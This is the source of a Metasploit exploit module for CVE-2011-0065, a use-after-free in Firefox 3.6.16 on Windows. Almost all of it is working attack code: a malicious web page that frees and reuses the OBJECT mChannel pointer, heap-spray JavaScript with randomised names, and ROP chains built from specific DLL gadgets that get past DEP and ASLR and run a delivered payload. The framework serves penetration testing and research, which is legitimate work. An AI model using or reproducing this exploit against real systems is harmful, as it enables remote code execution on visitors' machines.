modules/exploits/windows/browser/mozilla_mchannel.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::HttpServer::HTML
#include Msf::Exploit::Remote::BrowserAutopwn
#autopwn_info({
# :ua_name => HttpClients::FF,
# :ua_minver => "3.6.16",
# :ua_maxver => "3.6.16",
# :os_name => OperatingSystems::Match::WINDOWS,
# :javascript => true,
# :rank => NormalRanking,
#})
def initialize(info = {})
super(update_info(info,
'Name' => 'Mozilla Firefox 3.6.16 mChannel Use-After-Free Vulnerability',
'Description' => %q{
This module exploits a use after free vulnerability in Mozilla
Firefox 3.6.16. An OBJECT Element mChannel can be freed via the
OnChannelRedirect method of the nsIChannelEventSink Interface. mChannel
becomes a dangling pointer and can be reused when setting the OBJECTs
data attribute. (Discovered by regenrecht). This module uses heapspray
with a minimal ROP chain to bypass DEP on Windows XP SP3. Additionlay,
a windows 7 target was provided using JAVA 6 and below to avoid aslr.
},
'License' => MSF_LICENSE,
'Author' =>
[
'regenrecht', # discovery
'Rh0', # metasploit module
'mr_me <steventhomasseeley[at]gmail.com>' # win7 target
],
'References' =>
[
['CVE', '2011-0065'],
['OSVDB', '72085'],
['URL', 'https://bugzilla.mozilla.org/show_bug.cgi?id=634986'],
['URL', 'http://www.mozilla.org/security/announce/2011/mfsa2011-13.html']
],
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
'InitialAutoRunScript' => 'post/windows/manage/priv_migrate',
},
'Payload' =>
{
'Space' => 1024,
},
'Platform' => 'win',
'Targets' =>
[
[ 'Automatic', { } ],
# DEP bypass
[
'Firefox 3.6.16 on Windows XP SP3',
{
'Arch' => ARCH_X86,
'Fakevtable' => 0x0c00,
'Fakefunc' => 0x0c00001c,
}
],
# requires JAVA <= JAVA 6 update 26
# cop stack pivot = ASLR/DEP bypass
[
'Firefox 3.6.16 on Windows 7 + Java',
{
'Arch' => ARCH_X86,
'Fakevtable' => 0x1000,
'Fakefunc' => 0x100002a4,
'Ppppr' => 0x7c3410c0,
'Retn' => 0x7c3410c4,
}
]
],
'DefaultTarget' => 0,
'DisclosureDate' => '2011-05-10'
))
end
def junk
return rand_text_alpha(4).unpack("L")[0].to_i
end
def on_request_uri(cli, request)
# Random JavaScript variable names
js_element_name = rand_text_alpha(rand(10) + 5)
js_obj_addr_name = rand_text_alpha(rand(10) + 5)
js_sc_name = rand_text_alpha(rand(10) + 5)
js_ret_addr_name = rand_text_alpha(rand(10) + 5)
js_chunk_name = rand_text_alpha(rand(10) + 5)
js_final_chunk_name = rand_text_alpha(rand(10) + 5)
js_block_name = rand_text_alpha(rand(10) + 5)
js_array_name = rand_text_alpha(rand(10) + 5)
js_retns = rand_text_alpha(rand(10) + 5)
js_applet_name = rand_text_alpha(rand(10) + 5)
js_ppppr = rand_text_alpha(rand(10) + 5)
js_filler = rand_text_alpha(rand(10) + 5)
agent = request.headers['User-Agent']
# Set target manually or automatically
my_target = target
if my_target.name == 'Automatic'
if agent =~ /NT 5\.1/ and agent =~ /Firefox\/3\.6\.16/
my_target = targets[1]
elsif agent =~ /NT 6\.1/ and agent =~ /Firefox\/3\.6\.16/
my_target = targets[2]
end
end
# check for non vulnerable targets
if agent !~ /NT 5\.1/ or agent !~ /NT 6\.1/ and agent !~ /Firefox\/3\.6\.16/
print_error("Target not supported: #{agent}")
send_not_found(cli)
return
end
# Re-generate the payload
return if ((p = regenerate_payload(cli).encoded) == nil)
if my_target.name =~ /Windows 7/ and not request.uri =~ /\.html/
html_trigger = ""
if ("/" == get_resource[-1,1])
html_trigger = get_resource[0, get_resource.length - 1]
else
html_trigger = get_resource
end
custom_js = <<-JS
function forward() {
window.location = window.location + "#{html_trigger}.html";
}
function start() {
setTimeout("forward()", 3500);
}
start();
JS
else
if my_target.name =~ /Windows XP/
# DEP bypass using xul.dll
rop_gadgets = [
0x1052c871, # mov esp,[ecx] / mov edx,5c86c6ff / add [eax],eax / xor eax,eax / pop esi / retn 0x8 [xul.dll]
junk, # junk --------------------------------------------------------------^^
0x7c801ad4, # VirtualProtect
junk, # junk -------------------------------------------------------------------------^^
junk, # junk -------------------------------------------------------------------------^^
0x1003876B, # jmp esp
0x0c000040, # start address
0x00000400, # size 1024
0x00000040, # Page EXECUTE_READ_WRITE
0x0c0c0c00, # old protection
].pack("V*")
rop = rop_gadgets
elsif my_target.name =~ /Windows 7/ and request.uri =~ /\.html/
# 5 gadgets to pivot using call oriented programming (cop)
# these instructions are taken from: java.dll, zip.dll and MSVCR71.dll (non aslr)
# 1. MOV EDX,DWORD PTR DS:[ECX] / junk / junk / junk / PUSH ECX / CALL [EDX+28C]
# 2. PUSH EAX / PUSH EBX / PUSH ESI / CALL [ECX+1C0]
# 3. PUSH EBP / MOV EBP,ESP / MOV EAX,[EBP+18] / PUSH 1C / PUSH 1 / PUSH [EAX+28] / CALL [EAX+20]
# 4. CALL [EAX+24] / POP ECX / POP ECX / RETN (neatly place address onto the stack)
# 5. ADD EAX,4 / TEST [EAX],EAX / XCHG EAX,ESP / MOV EAX,[EAX] / PUSH EAX / RETN
rop_pivot = [
0x6D32280C, # 1. MOV EDX,DWORD PTR DS:[ECX] / junk / junk / junk / PUSH ECX / CALL [EDX+28C]
junk, # filler
0x6D7E627D, # 4. CALL [EAX+24] / POP ECX / POP ECX / RETN (neatly place address onto the stack)
0x7C3413A4, # 5. ADD EAX,4 / TEST [EAX],EAX / XCHG EAX,ESP / MOV EAX,[EAX] / PUSH EAX / RETN
].pack("V*")
# 319
# rop nops - RETN
rop_pivot << [0x7c3410c4].pack("V*") * 0x65 #(0xca-0x65)
# POP r32 / RETN
rop_pivot << [0x7c3410c3].pack("V*")
# 3. PUSH EBP / MOV EBP,ESP / MOV EAX,[EBP+18] / PUSH 1C / PUSH 1 / PUSH [EAX+28] / CALL [EAX+20]
rop_pivot << [0x6D7E5CDA].pack("V*")
# rop nops - RETN
rop_pivot << [0x7c3410c4].pack("V*") * 0xda # (0x75+0x65)
# POP r32 / RETN
rop_pivot << [0x7c3410c3].pack("V*")
# 2. PUSH EAX / PUSH EBX / PUSH ESI / CALL [ECX+1C0]
rop_pivot << [0x6D325BFC].pack("V*")
# https://www.corelan.be/index.php/2011/07/03/universal-depaslr-bypass-with-msvcr71-dll-and-mona-py/ <MSVCR71.dll>
rop_gadgets = [
0x7c346c0a, # POP EAX / RETN
0x7c37a140, # Make EAX readable
0x7c37591f, # PUSH ESP / ... / POP ECX / POP EBP / RETN
junk, # EBP (filler)
0x7c346c0a, # POP EAX / RETN
0x7c37a140, # *&VirtualProtect()
0x7c3530ea, # MOV EAX,[EAX] / RETN
0x7c346c0b, # Slide, so next gadget would write to correct stack location
0x7c376069, # MOV [ECX+1C],EAX / POP EDI / POP ESI / POP EBX / RETN
junk, # EDI (filler)
junk, # will be patched at runtime (VP), then picked up into ESI
junk, # EBX (filler)
0x7c376402, # POP EBP / RETN
0x7c345c30, # ptr to 'push esp / ret'
0x7c346c0a, # POP EAX / RETN
0xfffffdff, # size 0x00000201 -> ebx
0x7c351e05, # NEG EAX / RETN
0x7c354901, # POP EBX / RETN
0xffffffff, # pop value into ebx
0x7c345255, # INC EBX / FPATAN / RETN
0x7c352174, # ADD EBX,EAX / XOR EAX,EAX / INC EAX / RETN
0x7c34d201, # POP ECX / RETN
0x7c38b001, # RW pointer (lpOldProtect) (-> ecx)
0x7c34b8d7, # POP EDI / RETN
0x7c34b8d8, # ROP NOP (-> edi)
0x7c344f87, # POP EDX / RETN
0xffffffc0, # value to negate, target value : 0x00000040, target: edx
0x7c351eb1, # NEG EDX / RETN
0x7c346c0a, # POP EAX / RETN
0x90909090, # NOPS (-> eax)
0x7c378c81, # PUSHAD / ADD AL,0EF / RETN
0x90909090, # NOPS (-> eax)
].pack("V*")
rop = rop_pivot + rop_gadgets
end
payload_buf = ''
payload_buf << rop
payload_buf << p
escaped_payload = Rex::Text.to_unescape(payload_buf)
# setup the fake memory references
fakevtable = Rex::Text.to_unescape([my_target['Fakevtable']].pack('v'))
fakefunc = Rex::Text.to_unescape([my_target['Fakefunc']].pack('V*'))
if my_target.name =~ /Windows XP/
# fast loading JS so we dont get the 'unresponsive script' warning from ff
custom_js = <<-JS
#{js_element_name} = document.getElementById("d");
#{js_element_name}.QueryInterface(Components.interfaces.nsIChannelEventSink).onChannelRedirect(null,new Object,0)
#{js_obj_addr_name} = unescape("\x00#{fakevtable}");
var #{js_sc_name} = unescape("#{escaped_payload}");
var #{js_ret_addr_name} = unescape("#{fakefunc}");
while(#{js_ret_addr_name}.length < 0x80) {#{js_ret_addr_name} += #{js_ret_addr_name};}
var #{js_chunk_name} = #{js_ret_addr_name}.substring(0,0x18/2);
#{js_chunk_name} += #{js_sc_name};
#{js_chunk_name} += #{js_ret_addr_name};
var #{js_final_chunk_name} = #{js_chunk_name}.substring(0,0x10000/2);
while (#{js_final_chunk_name}.length<0x800000) {#{js_final_chunk_name} += #{js_final_chunk_name};}
var #{js_block_name} = #{js_final_chunk_name}.substring(0,0x80000 - #{js_sc_name}.length - 0x24/2 - 0x4/2 - 0x2/2);
#{js_array_name} = new Array()
for (n=0;n<0x80;n++){
#{js_array_name}[n] = #{js_block_name} + #{js_sc_name};
}
JS
elsif my_target.name =~ /Windows 7/
# setup precision heap spray
ppppr = Rex::Text.to_unescape([my_target['Ppppr']].pack('V*'))
retns = Rex::Text.to_unescape([my_target['Retn']].pack('V*'))
# fast loading JS so we dont get the 'unresponsive script' warning from ff
# precision heap spray
custom_js = <<-JS
#{js_element_name} = document.getElementById("d");
#{js_element_name}.QueryInterface(Components.interfaces.nsIChannelEventSink).onChannelRedirect(null,new Object,0)
#{js_obj_addr_name} = unescape("\x00#{fakevtable}");
var #{js_sc_name} = unescape("#{escaped_payload}");
var #{js_ret_addr_name} = unescape("#{fakefunc}");
var #{js_retns} = unescape("#{retns}");
#{js_ret_addr_name} += #{js_retns};
#{js_ret_addr_name} += #{js_retns};
#{js_ret_addr_name} += #{js_retns};
#{js_ret_addr_name} += #{js_retns};
var #{js_ppppr} = unescape("#{ppppr}");
#{js_ret_addr_name} += #{js_ppppr};
var #{js_filler} = unescape("%u4344%u4142");
while(#{js_filler}.length < 0x201) {#{js_filler} += #{js_filler};}
while(#{js_ret_addr_name}.length < 0x80) {#{js_ret_addr_name} += #{js_ret_addr_name};}
var #{js_chunk_name} = #{js_ret_addr_name}.substring(0,0x18/2);
#{js_chunk_name} += #{js_sc_name};
#{js_chunk_name} += #{js_filler};
#{js_chunk_name} += #{js_ret_addr_name};
var #{js_final_chunk_name} = #{js_chunk_name}.substring(0,0x10000/2);
while (#{js_final_chunk_name}.length<0x800000) {#{js_final_chunk_name} += #{js_final_chunk_name};}
var #{js_block_name} = #{js_final_chunk_name}.substring(0,0x80000 - #{js_sc_name}.length - 0x24/2 - 0x4/2 - 0x2/2);
#{js_array_name} = new Array()
for (n=0;n<0x80;n++){
#{js_array_name}[n] = #{js_block_name} + #{js_sc_name};
}
JS
end
end
html = <<-HTML
<html>
<body>
<object id="d"><object>
<applet code="#{js_applet_name}.class" width=0 height=0></applet>
<script type="text/javascript">
#{custom_js}
</script>
</body>
</html>
HTML
#Remove the extra tabs
html = html.gsub(/^ {4}/, '')
print_status("Sending HTML...")
send_response_html(cli, html, { 'Content-Type' => 'text/html' })
# Handle the payload
handler(cli)
end
end